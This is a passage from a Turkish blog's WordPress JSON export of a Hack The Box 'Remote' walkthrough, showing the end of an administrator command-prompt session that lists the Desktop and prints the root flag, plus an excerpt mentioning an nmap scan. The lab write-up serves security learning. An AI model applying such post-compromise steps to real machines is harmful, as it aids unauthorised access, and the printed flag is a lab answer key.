Pictures\n02\/19\/2020  04:03 PM    &lt;DIR&gt;          Saved Games\n02\/20\/2020  01:45 AM    &lt;DIR&gt;          Searches\n02\/19\/2020  04:03 PM    &lt;DIR&gt;          Videos\n               0 File(s)              0 bytes\n              14 Dir(s)  13,410,852,864 bytes free\n\nC:\\Users\\Administrator&gt;cd Desktop\ncd Desktop\n\nC:\\Users\\Administrator\\Desktop&gt;dir\ndir\n Volume in drive C has no label.\n Volume Serial Number is D582-9880\n\n Directory of C:\\Users\\Administrator\\Desktop\n\n02\/20\/2020  03:41 AM    &lt;DIR&gt;          .\n02\/20\/2020  03:41 AM    &lt;DIR&gt;          ..\n10\/06\/2021  08:11 PM                34 root.txt\n               1 File(s)             34 bytes\n               2 Dir(s)  13,410,656,256 bytes free\n\nC:\\Users\\Administrator\\Desktop&gt;type root.txt\ntype root.txt\n6d2275070481c4ed17c8dc4ede319c6e\n\nC:\\Users\\Administrator\\Desktop&gt;  \n<\/code><\/pre>\n<p>Son zamanlarda \u00e7\u00f6zd\u00fc\u011f\u00fcm en zevkli makinelerden biriydi!<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Makine Ad\u0131 Seviye OS Logo Remote &#8211; HTB Kolay Windows Walkthrough nmap taramas\u0131: \u250c\u2500\u2500(root&#x1f480;kali)-[~] \u2514\u2500# nmap 10.10.10.180 -p- -A -T4 -Pn Host discovery disabled (-Pn).&#8230;<\/p>\n<div class=\"more-link-wrapper\"><a class=\"more-link\" href=\"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/10\/07\/remote\/\">Devam\u0131n\u0131 oku<span class=\"screen-reader-text\">Remote<\/span><\/a><\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[498],"tags":[430],"class_list":["post-1589","post","type-post","status-publish","format-standard","hentry","category-walkthrough","tag-unquoted-service-path","entry"],"_links":{"self":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1589","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/comments?post=1589"}],"version-history":[{"count":1,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1589\/revisions"}],"predecessor-version":[{"id":1590,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1589\/revisions\/1590"}],"wp:attachment":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/media?parent=1589"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/categories?post=1589"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/tags?post=1589"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}